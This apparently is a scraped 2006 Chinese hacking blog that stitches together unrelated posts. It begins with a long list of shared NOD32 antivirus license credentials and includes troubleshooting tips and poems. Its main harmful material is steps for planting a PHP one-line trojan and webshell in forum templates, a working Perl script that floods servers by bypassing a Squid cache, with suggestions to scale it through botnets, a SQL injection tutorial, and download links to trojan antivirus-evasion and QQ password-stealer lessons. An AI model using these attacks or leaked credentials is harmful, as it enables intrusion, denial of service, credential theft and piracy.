以下ID测试可用：

UserName: AV-4431227
Password: hptgfky859

UserName: AV-4228428
Password: 9v52p0363i

UserName: AV-4438327
Password: crgpm2xuvj

UserName: AV-4163415
Password: t0h0v18mrx

UserName: AV-4163419
Password: rfodm5i0xf

UserName: AV-4210852
Password: 152m7ren76

UserName: AV-4239253
Password: 0p2rix679u

UserName: AV-4443342
Password: tsugh3sjj2

UserName: AV-4484855
Password: caw2081bbp

UserName: AV-4407870
Password: yq01pmi13p

UserName: AV-4156126
Password: b1y2urpe2q

UserName: AV-4235397
Password: 0n6natysod

UserName: AV-4455189
Password: 9k7gfx2cr9

UserName: AV-4163420
Password: 9q4ii0dsyj

UserName: AV-4479240
Password: v5fmf84mpe

UserName: AV-4479246
Password: t5j8x2deq3

UserName: AV-4435985
Password: 0fo9uqo8w3

UserName: AV-4479790
Password: drypunjs92

UserName: AV-4432550
Password: 0815edgg8o

UserName: AV-4662098
Password: s7601r3pyq

UserName: AV-4662103
Password: 6c0uuc46fm

UserName: AV-4662107
Password: 32pnp7ig4o

UserName: AV-4662114
Password: frjcrbsgb8

UserName: AV-4662117
Password: erny8518cx

UserName: AV-4662116
Password: d7qpgf1hnx

UserName: AV-4662121
Password: bgcr21ej10

UserName: AV-4662144
Password: vphh4brd48

UserName: AV-4662152
Password: qvcopaeq31

UserName: AV-4662156
Password: p4v3t2igbs

UserName: AV-4662125
Password: qm5mwmg0iv

UserName: AV-4662581
Password: iuanhvhrgm

UserName: AV-4662577
Password: je49sr8p5w

UserName: AV-4662576
Password: 24n5edqbae

UserName: AV-4462481
Password: 1r13twsnq5

UserName: AV-4508068
Password: q7ipjm16xb

UserName: AV-4516881
Password: 2m6kcpfm1b

以上为22日最新更新！！！
绝对保证正版NOD32升级ID和KEY，如果用的好希望大家顶一下。谢谢

保证最新。最快。最正版！！！及时更新！！！

绝对保证正版NOD32升级ID和KEY，如果用的好希望大家顶一下。谢谢

如当天未更新，表明现在的ID和KEY都是可用的。

一、感染了病毒所致


这种情况往往表现在打开IE时，在IE界面的左下框里提示：正在打开网页，但老半天没响应。在任务管理器里查看进程，（进入方法，把鼠标放在任务栏上，按右键—任务管理器—进程）看看CPU的占用率如何，如果是100%，可以肯定，是感染了病毒，这时你想运行其他程序简直就是受罪。这就要查查是哪个进程贪婪地占用了CPU资源。

找到后，最好把名称记录下来，然后点击结束，如果不能结束，则要启动到安全模式下把该东东删除，还要进入注册表里，（方法：开始—运行，输入regedit）在注册表对话框里，点编辑—查找，输入那个程序名，找到后，点鼠标右键删除，然后再进行几次的搜索，往往能彻底删除干净。

有很多的病毒，杀毒软件无能为力时，唯一的方法就是手动删除。

二、与设置代理服务器有关

有些筒子，出于某些方面考虑，在浏览器里设置了代理服务器（控制面板--Internet选项—连接—局域网设置—为LAN使用代理服务器），设置代理服务器是不影响QQ联网的，因为QQ用的是4000端口，而访问互联网使用的是80或8080端口。这就是很多的筒子们不明白为什么QQ能上，而网页不能打开的原因。而代理服务器一般不是很稳定，有时侯能上，有时候不能上。如果有这样设置的，请把代理取消就可以了。

三、DNS服务器解释出错

所谓DNS，即域名服务器（Domain Name Server）,它把域名转换成计算机能够识别的IP地址，如深圳之www.sz.net.cn）对应的IP地址是219.133.46.54，深圳热www.szonline.net）对应的IP地址是202.96.154.6。如果DNS服务器出错，则无法进行域名解释，自然不能上网了。

如果是这种情况，有时候是网络服务接入商即ISP的问题，可打电话咨询ISP；有时候则是路由器或网卡的问题，无法与ISP的DNS服务连接。

这种情况的话，可把路由器关一会再开，或者重新设置路由器。或者是网卡无法自动搜寻到DNS的服务器地址，可以尝试用指定的DNS服务器地址。在网络的属性里进行，（控制面板—网络和拔号连接—本地连接—右键属性—TCP/IP协议—属性—使用下面的DNS服务器地址）。不同的ISP有不同的DNS地址，如电信常用的是202.96.134.133(主用) 202.96.128.68（备用）。

更新网卡的驱动程序或更换网卡也不失为一个思路。

四、系统文件丢失导致IE不能正常启动

这种现象颇为常见，由于：

1、系统的不稳定 表现为死机频繁、经常莫名重启、非法关机造成系统文件丢失；

2、软硬件的冲突 常表现为安装了某些程序引起网卡驱动的冲突或与IE的冲突。自从INTEL推出超线程CPU后，有一个突出的问题是XP SP1下的IE6与超线程产生冲突；

3、病毒的侵扰 导致系统文件损坏或丢失。

如果是第一种情况，可尝试修复系统，2K或XP系统下，放入原安装光盘（注意：一定要原安装光盘），在开始—运行里输入sfc /scanow，按回车。98的系统也可以用sfc命令进行检查。

如果是第二种情况，可以把最近安装的硬件或程序卸载，2K或XP的系统可以在机器启动后，长按F8，进入启动菜单，选择“最后一次正确的配置”，若是XP系统，还可以利用系统的还原功能，一般能很快解决问题。

如果是XP的系统因超线程CPU的原因，可以在BIOS里禁用超线程，或升级到SP2。（当然，XP如何升级SP2涉及到很多知识及要注意的问题，在此限于篇幅不再详述）。这种情况下，QQ里自带的TT浏览器一般能正常浏览，可改用一试。

如果是第三种情况，则要对系统盘进行全面的查杀病毒。

还有一种现象也需特别留意：就是能打开网站的首页，但不能打开二级链接，如果是这样，处理的方法是重新注册如下的DLL文件：

在开始—运行里输入：

regsvr32 Shdocvw.dll

regsvr32 Shell32.dll （注意这个命令，先不用输）

regsvr32 Oleaut32.dll

regsvr32 Actxprxy.dll

regsvr32 Mshtml.dll

regsvr32 Urlmon.dll

regsvr32 Msjava.dll

regsvr32 Browseui.dll

注意：每输入一条，按回车。第二个命令可以先不用输，输完这些命令后重新启动windows，如果发现无效，再重新输入一遍，这次输入第二个命令。还有，如果是98的系统，到微软的网站上下载这个文件也许更简单，这个文件的下载地址是：

http://download.microsoft.com/download/msn...us/mcrepair.exe

五、IE损坏

以上方法若果都不奏效，有可能是IE的内核损坏，虽经系统修复，亦无法弥补，那么重装IE就是最好的方法了。

如果是98或2K系统，IE的版本若是5.0，建议升级到6.0。

98的系统如果已经升级安装了6.0，那么在控制面板里点击添加/删除程序，将会弹出一个修复对话框，选择默认的修复，重新启动即可。

如果是2K+IE6.0或XP（自带的IE就是6.0的）的系统，重新IE有点麻烦，有两种方法：

1、打开注册表，展开HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{ 89820200-ECBD-11cf-8B85-00AA005B4383 }，将IsInstalled的DWORD的值改为0即可




网页打不开 Windows的Hosts表是祸首(这个也有可能)

很多朋友在网上冲浪时，经常会遇到有些网页可以顺利地打开，而有些网页却无论如何也打不开，而在其它电脑中却又可以轻松地打开。出现这种情况，最大的可能就是你的IE浏览器中招了，而Hosts表文件往往是祸之源头。
　　一、什么是Hosts表文件

　　Hosts表文件是一个没有扩展名的文件，但是它属于文本文件格式的文件。你可以使用记事本程序对其进行编辑。Hosts表文件中存放的是一些常用的网站主机的域名和其对应的IP地址。当我们在使用浏览器浏览一个网站时，在地址栏中输入网站的域名并回车后，系统必须通过某种渠道将这个域名转换为其对应的唯一的IP地址，这项工作通常是由DNS(域名解析服务器)服务器来完成的。而在系统将域名将给DNS服务器处理之前总是先在检查本地的Hosts表文件，看其中是否已经有相应的域名与IP地址的对应关系，如果有就会直接采用，因而会节约大量时间。

　　正因为这个原因，假如Hosts表文件中的某个域名与IP地址产生了错误的对应，当你在浏览器中输入这个域名试图打开其对应的网页时，就会出现打不开的情况，而那些没有映射错，或是没有在Hosts表中有相应记录的网站则可以正常地打开。这就是上面我们提到的为什么有些网址不能打开，而在其他电脑中可以顺利地打开的原因之所在。很多恶意程序经常会闹这样的恶作剧。

　　二、中招后的解决方案

　　知道了原理后，假如我们的浏览器中招而导致某些网站不能正常打开的话，我们就可以通过修改Hosts表文件来解决了。Hosts表文件在系统中的位置，Windows 9X系统存放在C:Windows目录，Windows NT/2000系统，其保存在c:winntsystem32driversetc目录，Windows XP系统保存在c:windowssystem32driversetc，如果找不到的话，可以通过系统的搜索工具进行搜索。找到后，直接用记事本将其打开，然后将除了“#”开头的其它行内容全部删除，例如“127.0.0.1 onlinestore.smgbb.cn”，最后单击“文件→保存”将其保存即可。当然，你也可以选择性地删除那些被屏蔽了的而你又想访问的网站，这样其他被屏蔽的网站则不会受影响。

　　如果你嫌上述手工方法太笨拙，你也可以通过专门的工具来达到目的。上网助手2005(下载地址:http://dl.3721.net/download/assist4.exe)就可以让你轻松地修复Hosts表文件了:

　　下载并安装了上网助手后，在IE地址栏中找到“上网助手”图标，单击右侧的黑三角形，选择“修复IE→IE修复专家”，在打开的窗口中选择“编辑Hosts表”选项卡。

　　如果你不想一条一条地更改，直接单击“清空HOST表”按钮，最后单击“立即保存”按钮即可。否则你可以在列表中勾选那些被屏蔽掉而不能访问的网站域名，再单击“删除→立即保存”按钮。

　　三、经验之谈

　　当你遇到某些网站打不开，而有些网站可以顺利地打开，除了在IE浏览器中设置了网址过滤之外，Hosts表文件被动了手脚就是最可疑之处了。通过上面的方法，一般都可以轻松地解决。鉴于此，一些烦人的网站(例如，百度插件安装页)，我们倒可以利用这个特性将其“屏蔽”掉，方法很简单，只要在Hosts表文件中的尾行中追加类似于:127.0.0.1 bar.baidu.com(127.0.0.1与bar.baidu.com之间用空格分隔开)一行，最后保存并退出Hosts表文件即可。你也可以使用上网助手的Hosts表文件编辑功能来操作，在图1所示的窗口中单击“添加”按钮，然后在下面的“IP地址”和“域名”栏中分别输入127.0.0.1 和bar.baidu.com，最后单击“立即保存”即可。按同样的方法，可以将其他不想让其在本台电脑中可以访问的网站“屏蔽”掉。

你斑斓的色彩
像一道绚丽的彩虹
突然
出现我面前


你的美丽
我早已听闻
那传说中的神奇
是你吗



我曾在浩淼的宇宙里将你觅寻
我曾在山长水远中将你苦思
踏破了一生的平静
你却悄然来了


你带着绚烂的美丽
幸福，便像一袭斑斓的彩衣
你快乐吗？那是你吗？
我于无尽的惊喜里咀嚼幸福的永恒


我倔强的站在街头
我冷眼相看身旁的往来人潮
我不再爱
那无边的喧嚣和虚空



宁愿自己只是那一片秋天里的落叶
正从繁华里凋谢
我不再爱
那暗涌在繁华背后的虚伪和丑陋



多么可耻
多么可悲



我宁愿一年四季只穿一袭破衣
乞丐似
但我并非乞丐
我只是物欲里的一个变异因素



我宁愿自己从不曾出生
仍然是土地下的泥石一颗
我从不曾有知有觉
但却最真实无华

1。进入后台

2。论坛管理-模版编辑

3。 在Actions里面插入一句话木马 注:一句话PHP专用的

4。用一句话木马客户端连接上
http://www.xxx.com/templates/default/actions.lang.php

5。用PHP一句话的客户端写入webshell 。

技术背景

随着Web技术越来越广泛的应用到我们的生活，Web应用的架构的设计者和开发者不得不面对这么一个问题，那就是Web不断增长的访问量和负载，随之提升性能的相关技术应运而生，如DNS轮询、负载均衡、Cache技术等等。如果有兴趣，大家不妨对大型网站进行一下抓包，可以发现很多网站都采用了squid反向代理，通过Squid的Cache提供高速Web响应。

攻击原理

Cache机制不仅给服务器处理带来了很大程度的性能提升，一定程度上，也大大提升了Web服务提供商应对Get Flood的能力。

用户对网站的访问，大多被分布的Cache服务器分担了，由于Cache服务器的数量以及Cache的良好处理吞吐性能，即便发生了Get Flood等攻击，此种机制也可以很好的自身消化掉攻击负载，并且即便单一Cache主机瘫痪也不会对整体Web服务造成影响。

我们可以假设这样一种形势，如果攻击者可以穿过Cache，直接将负载压力传达到后台提供HTTP服务的服务器，将这台机器攻击瘫痪，那么前台的服务器也将因为Cache无法得到更新而服务受到影响，达到拒绝服务的效果。

那么是否有方法可以达到上述效果呢？答案是肯定的，那就是通过HTTP指令来达到此种攻击。

HTTP协议（v1.1和v1.0）都提供了Cache处理字段，其中字段Cache-Control（v1.0中为Pragma），当这个字段的值为no-cache时，大多数cache软件将不对请求作出响应，而直接将请求传递到后台服务器，利用这个指令的机制，我们就可以实现我们所要达到的攻击效果。

效果验证

为了验证这种理论上的攻击形式，Coolc架设了简单的应用环境进行验证

正常访问

而在正常情况下，Squid会在内存Cache中处理所有请求，可以发现大多数请求的压力根本无法到达Apache，而直接在Squid消化。如下所示，500个请求，只有一个到达了Apache，而这个访问，只是Squid为了到Apache拉取最初始的文件内容造成的。


root@coolc:~/squid-2.5.STABLE12#cat apache-host.example.com-access_log 　wc -l
1
root@coolc:~/squid-2.5.STABLE12# cat squid_access.log 　awk '{print $4'}　uniq -c
499 TCP_MEM_HIT/200


指令绕过

当Squid在处理访问时，如果发现特殊的标志位后，其将会直接将请求向后转发，同事将在访问日志中记为一条TCP_CLIENT_REFRESH_MISS。通过下面试验，我发送了500个带特殊标志位的HTTP请求，直接越过了Cache，而将压力直接加载到后台，下面的结果我们验证了效果。


用Pragma: no-cache绕过
root@coolc:~/squid-2.5.STABLE12#cat apache-host.example.com-access_log 　wc -l
500
root@coolc:~/squid-2.5.STABLE12# cat squid_access.log 　awk '{print $4'}　uniq -c
500 TCP_CLIENT_REFRESH_MISS/200

用Cache-Control:no-cache绕过
root@coolc:~/squid-2.5.STABLE12# cat apache-host.example.com-access_log 　wc -l
500
root@coolc:~/squid-2.5.STABLE12# cat squid_access.log 　awk '{print $4'}　uniq -c
500 TCP_CLIENT_REFRESH_MISS/200


演示代码：



use IO::Socket;
#$host=shift(@ARGV);
$i=1;
while ($i<500) {
$i++;
print " $i ";
$remote = IO::Socket::INET->new(Proto => "tcp",
PeerPort => "80",
#PeerAddr => "blog.xfocus.net"
PeerAddr => "test.qq.com"
)　　die(print "cant't connet $!");
$remote->autoflush(1);
print $remote "GET /index.html HTTP/1.1 Accept:image/gif image/x-xbitmap,
image/jpeg,application/x-shockwave-flash Referer: http://www.google.com Accept:-
Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1) Cache-Control:no-
cache HOST:test.qq.com ";
#print <$remote>;
close $remote;
#sleep 1;
}


实际应用

利用配置问题

在实际应用中的攻击，也许对方网管会采取作Squid的ACL方法来屏蔽此种攻击，但是实际环境中的攻击种类和方法会更加多样化，例如利用Squid默认配置中存在的问题，一样可以达到灵巧利用此问题，并具有一定隐蔽性。

场景某网管在Squid通过ACL做了no-cache过滤，使得加杂no-cahce的指令无法穿过，但是一样遭到了Cache拒绝服务攻击。

攻击原理

Squid的处理方式当返回为404、403时，通过cache处理减轻后台Web系统的负担。

通过程序用GET方式访问500次不存在的文件“index.html。”

查看squid的日志，cache住了绝大多数请求。


root@coolc:~/squid-2.5.STABLE12# cat squid_access.log 　wc -l
499
root@coolc:~/squid-2.5.STABLE12# cat squid_access.log 　awk '{print $4'}　uniq -c
499 TCP_NEGATIVE_HIT/404
root@coolc:~/squid-2.5.STABLE12# cat apache-access_log 　wc -l
0


而实际上传到到Apache上的压力为0，也就是几乎没有压力。TCP_NEGATIVE_HIT解决了大多数的负载，导致攻击压力全部不能施加在后台的Web服务器。


从Squid的配置文件里可以看到，Squid对于特殊错误的返回也是做了处理的，一样做了Cache。


# TAG: negative_ttl time-units
# Time-to-Live (TTL) for failed requests. Certain types of
# failures (such as "connection refused" and "404 Not Found") are
# negatively-cached for a configurable amount of time. The
# default is 5 minutes. Note that this is different from
# negative caching of DNS lookups.



是否有方式可以绕过cache机制和ACL限制，将类似404压力施加到服务器上？答案时肯定的，那就是通过访问cgi-bin目录下的文件。


通过执行攻击代码我们同样实现了对后台主机的攻击，穿透了Cache。


root@coolc:~/squid-2.5.STABLE12# cat squid_access.log 　awk '{print $4'}　uniq -c
499 TCP_MISS/404

root@coolc:~/squid-2.5.STABLE12# cat apache-access_log 　wc -l
499


从日志中可以发现如下痕迹。


172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298
172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298
172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298
172.16.10.1 - - [08/Apr/2006:16:33:50 -0800] "GET /cgi-bin/index.html1 HTTP/1.0" 404 298



实际上造成上述原因就死活因为默认配置中对于cgi-bin目录做了特殊处理，导致对于其放开了Cache的限制。



# TAG: hierarchy_stoplist
# A list of words which, if found in a URL, cause the object to
# be handled directly by this cache. In other words, use this
# to not query neighbor caches for certain objects. You may
# list this option multiple times. Note: never_direct overrides
# this option.
#We recommend you to use at least the following line.
hierarchy_stoplist cgi-bin ?
# TAG: no_cache
# A list of ACL elements which, if matched, cause the request to
# not be satisfied from the cache and the reply to not be cached.
# In other words, use this to force certain objects to never be cached.
#
# You must use the word 'DENY' to indicate the ACL names which should
# NOT be cached.
#
#We recommend you to use the following two lines.
acl QUERY urlpath_regex cgi-bin ?
no_cache deny QUERY



攻击代码：


use IO::Socket;
#$host=shift(@ARGV);
$i=1;
while ($i<500) {
$i++;
print " $i ";
$remote = IO::Socket::INET->new(Proto => "tcp",
PeerPort => "80",
#PeerAddr => "blog.xfocus.net"
PeerAddr => "test.qq.com"
)　　die(print "cant't connet $!");
$remote->autoflush(1);
print $remote "GET /cgi-bin/index.html1 HTTP/1.1 Accept:image/gif image/x-
xbitmap, image/jpeg,application/x-shockwave-flash Referer:
http://www.google.com Accept:-Language: zh-cn User-Agent: Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)
HOST:test.qq.com ";
#print <$remote>;
close $remote;
#sleep 1;
}



扩展思路

当然目前这种攻击方式还仅仅是理论上的攻击，比如攻击代码单线程，攻击IP和特征明显。很容易被识别并作ACL过滤。但是当我们扩展思路，如果我们利用大量的botnet或代理，变化所访问的文件和HTTP指令内容进行攻击，那么造成的攻击将会更加有威力，并且难以识别。同时由于攻击负责将直接加载于后台，那么作为防御方的主机资源优势也大打折扣。

防御方法

最简单有效的方法无非是通过SQUID的配置中加载ACL禁用no-cache指令，不过此方法往往只在静态页面的服务器比较容易实现。

如：


acl LocalServers dst 192.168.8.0/24
no_cache deny LocalServers


总结

实际上HTTP指令的攻击不仅仅与此，本身HTTP协议的扩展协议指令一样有很多有待挖掘的地方，对于此种攻击思路，虽然Coolc目前还没看到相关的描述，但是个人感觉也许在地下组织中，这些思路早已出现，甚至已经有了成熟的工具，coolc在这里全当抛砖引玉，希望对网络安全有兴趣的同仁可以同我联系，共同讨论研究。

第一讲：判断有没注射点
这个很简单，我们最常用的就是看到页面的格式为：index.php?id=2这样的地址，我们知道PHP经常是和MYSQL数据库一起用的，在MYSQL数据库中一定存在一个表，比如setting_table，我们提交上面地址的时候，程序一般上这样处理的：
1、用GET或者POST取我们提交的id=1把这个值传给一个变量:$id.
2、查询：select * from setting_table where id =$id
上面的语句就是查询的语句，我们代入$id=1就是:
select * from setting_table where id=1
这话是没什么问题的，会取出id为１的信息进行显示给我们，所以我们就能看到正常的页面。


－－－－－－－－－－－－－－
看我们是怎么判断的：
１、我们提交id=1 and 1=1
看看这个是什么效果，这里的$id就是1 and 1=1，我们看看是什么样子的：
select * from setting_table where id =1 and 1=1
这个语句加了一个and 语句，后面是1=1是肯定成立的，所以就不影响上面语句的成立，它还会取出id=1的信息进行显示给我们，所以我们看到的还是原来的正常页面。
２、我们提交 id =1 and 1=2
看看这个是什么效果，这里的$id就是 1 and 1=2,我们看看在ＳＱＬ中怎么执行
select * from setting_table where id =1 and 1=2
分析下这个语句，前面还是一样的，只是最后加了个and 1=2，这个自然不成立啦！又因为是and连接的，so自然找不到符合条件的啦！只能回显给我们一个错误或者空白的页面拉～！！

上面就是一般我们采用and 1=1 & and 1=2来判断的基本原来，但是这里还要注意几点，如下：
１、程序处理的时候必须是where id =$id 而不是where id=$id，这个单引号是很不一样的，怎么不一样，以后再说。。
２、程序对我们提交的参数没有处理或者处理的不好，导致我们可以直接提交，如果程序多我们提交的参数进行处理，又会不一样，也是后话！

第二讲：快速判断ＭＹＳＱＬ版本

前提：你得到一个注射点，比如：news.php?id=1
这个点是你找到的，提交and 1=1 和and 1=2返回的是不同的。

我们就可以这样来猜ＭＹＳＱＬ的版本了。。步骤如下：
１、提交/news.php?id=1/*!40000%20s*/　如果返回正常就说明ＭＹＳＱＬ版本在4000版本以下，你可以依次调节最高位的数字，比如我改为３９０００提交，如果再正常，就提交３８０００....直到返回错误提示，最后固定的那个就是ＭＹＳＱＬ的版本了。。
下面是我提交测试时的过程（只写ＭＹＳＱＬ版本）
４００００（＋）－－３９０００（＋）－－３８０００（＋）－－３７００００（－）－－３７９００（＋）－－３７８００（＋）－－３７７００（－）－－结束！！
得到ＭＹＳＱＬ版本是３７７００。

２、一般我们不去猜具体的版本，我们只关系ＭＹＳＱＬ是不是在４.０以上，以为只有４.０以上的ＭＹＳＱＬ才支持ＵＮＩＯＮ查询，以下是不支持的，所以我们经常只用/*!40000%20s*/　看看是不是４.0以上的版本。

ＰＳ：/*!40000%20s*/　这里的/*!......*/是mysql里一种特殊的注释方式，也没什么好奇怪的，记得怎么用就可以了～～

第三讲：PHP注射怎样得到表名。。

正准备写，看到有人问到了，就总结下，算第三讲吧！


Quote:
originally posted by spirit at 2006-5-16 05:57 PM:
看了好多 文章了 ....眼睛都花了
里面涉及到的东西也比较全面
不过 一直不知道怎么搞出 表
总不能直接搞 去 字段吧..？？
一个一个来啊
数据库 表 字段 值...
这个逻辑我认为是对的 ....
对了这里还是 感 ...

表确实不好搞，不像ASP可能直接暴出来，PHP到现在还是暴不出来的，我们一般有两个办法：
1、靠经验猜：比如大家常用的admin,user,news,vote,wenzhang,guanliyuan等等，没办法的事。。
2、暴代码查看：用Load_file暴出文件代码，就可以看到数据插值到什么表，什么字段了，这样就很明白了，但是load_file也很有技巧的。。以后再讲。。
--------------------------------------------
具体说一下吧：
1、这个没什么好说的，直接猜就可以了，比如你看到一个注射点，类似news.php?id=1这样的点，你用union查询得到具体的字段，比如这样：news.php?id=1 and 1=2 union select 1,2,3,4 是成立的，
你就可以这样猜：news.php?id=1 and 1=2 union select 1,2,3,4 from admin/*如果存在admin表，就会返回真，否则就不存在表admin，其他和这个一样的。

2、这个就有点终极了，比如你得到他的绝对路径，可以load_file(file path)出文件的代码，比如你暴得管理员登陆的页面，就能看到他其中的SQL语句，可以看到他是从哪个表了取的值了，是吧》》

原理就是这样的，多多思考，有什么心得，希望能分享。。。。

第四讲：有无引号的差别

很多朋友都对那个引号的作用不很了解,认为加引号和不加是一样的效果..

引号（包括单、双）对我们的注射是有着很大的影响的，这里主要还是和magic的状态有关，当这个magic为off的时候倒没什么影响，当这个magic为on的时候就大不一样了。。
小知识：magic为on时，为自动为我们提交的单引号（‘），双引号（“），（），空格（ ）等加上转意 符号，使得上的都变成（\’），（”），（\）等，这就给我们注射太来麻烦，例子如下。

一、第一个例子（没引号）
如果语句如下：

QUOTE:
select * from news where newsid=$id

1、magic为off时情况
为off时不会处理我们提交的数据信息，假设一个SQL语句是这样的；
我们在URL中可以提交$id的值，就像我们前面说的给$id为：
$id=1 union select 1,2,3,4 from admin
就基本上可以取得我们想要的数据了。
2、magic为on时情况
这时没什么区别，因为我们没有提交敏感的字符

二、第二个例子看它处理的SQL语句：

QUOTE:

select * from news where newsid=$id

这时要想成功利用$id这个没过滤的参数，我们可以提交如下：
$id=1’ union select 1,2,3,4 from admin/*
开始要有一个（）来闭合前面的，后面再加一个/*注释掉后面的

1、magic为off时情况
如果magic为off，我们可以直接提交，成功利用

2、magic为on时情况
如果magic为on，那么我们提交的语句变成：
$id=1’ union select 1,2,3,4 from admin/*
看，就没办法利用了（尽管有漏洞）

第一课2006年免杀新技术综合总结与分析
地址:http://vip.cech.com.cn/310824/276e75a9fa99ff4b9ab350f3f328b8db49e75162.down
第二课免杀学习方法技巧与环境详解
地址:http://vip.cech.com.cn/310854/b1938a1a98b7d09cb85f004b561ecba7eab913a1.down
第三课06年流行免杀工具终极组合技巧篇
地址:http://vip.cech.com.cn/310844/51e6c906247d3cef28c38e9cc115928f2b8b9ba8.down
第四课手工加密加花方法演示
地址:http://vip.cech.com.cn/311954/9b09c406166b09612d996c902a222cfbf90afa30.down
第五课免杀工具灵活组合打造超强免杀木马
地址:http://vip.cech.com.cn/311694/ded30f29ae6a8e0c12165dc60ab7ab69ce6e877f.down
第六课myccl定位复合特征码原理与使用介绍
地址:http://vip.cech.com.cn/315334/14bd37ecc46e6063f17e3186249aac9c1ffd1cb8.down
第七课实战myccl定位文件复合特码
地址:http://vip.cech.com.cn/315614/da57136fb9cdf0e14806b81d9f5029646e914502.down
第八课实战myccl定位内存复合特码
地址:http://vip.cech.com.cn/311904/63e50e2dbce4b4581e04da8cab976d1cabf40c83.down
第九课mycll综合定位特征码技巧总结篇
地址:http://vip.cech.com.cn/315324/e47f5eeb76dcbf4372c517e89cced7c956af3804.down
第十课编写花指令之必备汇编知识总结
地址:http://vip.cech.com.cn/312804/d8e69eea48c072e8b8fd2a64bc27f9c193777377.down
第十二课编写自己免杀花指令方法总结一
地址:http://vip.cech.com.cn/312794/be9536d72b63a818906b0cd64143f38eab4de510.down
第十三课编写自己免杀花指令方法总结二
地址:http://vip.cech.com.cn/315644/0b5f183220100e1e0b9110272690d3c66f70741a.down
第十四课花指令轻松过卡巴之终极秘籍总结
地址:http://vip.cech.com.cn/315674/fc45898af1dc4133b10aace2978441854f4203b8.down
第十五课修改PE头反调试免杀法(一)
地址:http://vip.cech.com.cn/311674/9021cd92a60ca01522e7bbf6d01a0f8409a3bf22.down
第十五课修改PE头反调试免杀法(二)
地址:http://vip.cech.com.cn/311574/d1dd11bdaa934f8ac9cb2eb22c36e741bd905768.down
第十六课绝密免杀最新技术的揭密与研究过程
地址:http://vip.cech.com.cn/311704/fa621f89421c08f248daa557ef5c089e6af31617.down
第十七课UPX壳的几种经典改壳免杀方法
地址:http://vip.cech.com.cn/311914/30be57dbb2eabdb2690f608732887f7ad7a7775b.down
第十八课北斗壳的几种超级免杀改壳方法(一)
地址:http://vip.cech.com.cn/312004/3ce9a8a1ba6e8edb891e28b82e1c89b149a55a16.down
第十八课北斗壳的几种超级免杀改壳方(二)
地址:http://vip.cech.com.cn/311994/afbde4bfeb58d4ea22203d5254a159ccf42f2e94.down
第十九课常见压缩壳的免杀修改方法总结篇(一)
地址:http://vip.cech.com.cn/311974/4f5882ec0e65f5797c033a528cb8acf11af7ac5a.down
第十九课常见压缩壳的免杀修改方法总结篇(二)
地址:http://vip.cech.com.cn/311984/56499a606d430ade24d810d6743c906ca0253968.down
第二十课免杀卡巴思路与技巧总结 :
地址:http://vip.cech.com.cn/311964/64f6989b638d64f0bca23edec29bc7917074d6c9.down
第二十一课 06年木马免杀常见疑难问题及解决策略篇
地址:http://vip.cech.com.cn/311864/37b71b55fd093ea0dcc53540bb5cd7eedb3239e9.down
第二十一课 06年木马免杀常见疑难问题及解决策略篇[补]
地址:http://vip.cech.com.cn/311874/dc6276733edb2dce52a0070d9da0c5a56e9fa34b.down
第二十二课06年各种杀毒软件查杀特点与免杀对策方案
地址:http://vip.cech.com.cn/312134/4aa36886b4370ad4cd08f00760b4647521149445.down
第二十三课06年综合木马免杀方案精华浓缩与总结
地址:http://vip.cech.com.cn/311884/788fdf3bd3b7c1f5aa4190f5dae741cd415fae99.down
第二十四课2006VIP灰鸽子最新免杀演示
地址:http://vip.cech.com.cn/312154/fc5f13a6dc8c422c8be5772caea76207dd0414e4.down
第二十四课2006VIP灰鸽子最新免杀演示
地址:http://vip.cech.com.cn/312164/782dd8e0ec0c0b64146fa1bce255b577204be56b.down
第二十五课黑防鸽子全免杀演示
地址:http://vip.cech.com.cn/312144/18327576c215c728033c87b9be6384d0aac45fb9.down
第二十六课黑防鸽子免杀策略分析
地址:http://vip.cech.com.cn/315314/3999dc529978643643a2e60e698797bc850dc07f.down
第二十七课黑防鸽子最新7处内存特征码修改详解(一)
地址:http://vip.cech.com.cn/312754/91922115a907660c8d93e8c38796d5669fb13517.down
第二十七课黑防鸽子最新7处内存特征码修改详解(二)
地址:http://vip.cech.com.cn/312764/675a8818bdbb3baa03f96d0cf3a29c0b335146d3.down
第二十八课不改内存特征码过瑞星内存法
地址:http://vip.cech.com.cn/312784/b37e7d1c0c01c57fe2afd644ba0b058c350dbf46.down
第二十九课黑防鸽子过专杀演示与研究
地址:http://vip.cech.com.cn/312774/263b0dd6a9bb0d2269efce59a7c0ab2ceb4c226d.down
第三十课灰鸽子自带映射器vport1.0的免杀打造
地址:http://vip.cech.com.cn/312744/f1fa65e10addcc673d259c3ccce776e4b8c5fee6.down
第三十一课打造个人全免杀完美QQ盗无限制版
地址:http://vip.cech.com.cn/312734/980442abd8b9cde2eff842a4cf7af0eeca7cba09.down

呵呵 明天MS她就要回南昌了 呵呵 离开那鬼地方

应该是后天到达南昌 呵呵 激动啊

唉ARP欺骗是个弱智低能的一种攻击 懂得协议的人都知道

但是还是有很多网吧受到攻击 本人实在没有时间于是转来此文章一篇


在局域网中，通信前必须通过ARP协议来完成IP地址转换为第二层物理地址（即MAC地址）。ARP协议对网络安全具有重要的意义。通过伪造IP地址和MAC地址实现ARP欺骗，对网络的正常传输和安全都是一个很严峻的考验。
“又掉线了！！！”每当听到客户的抱怨声一片响起，网管员就坐立不安。其实，此起彼伏的瞬间掉线或大面积的断网大都是ARP欺骗在作怪。ARP欺骗攻击已经成了破坏网吧经营的罪魁祸首，是网吧老板和网管员的心腹大患。

目前知道的带有ARP欺骗功能的软件有“QQ第六感”、“网络执法官”、“P2P终结者”、“网吧传奇杀手”等，这些软件中，有些是人为手工操作来破坏网络的，有些是做为病毒或者木马出现，使用者可能根本不知道它的存在，所以更加扩大了ARP攻击的杀伤力。

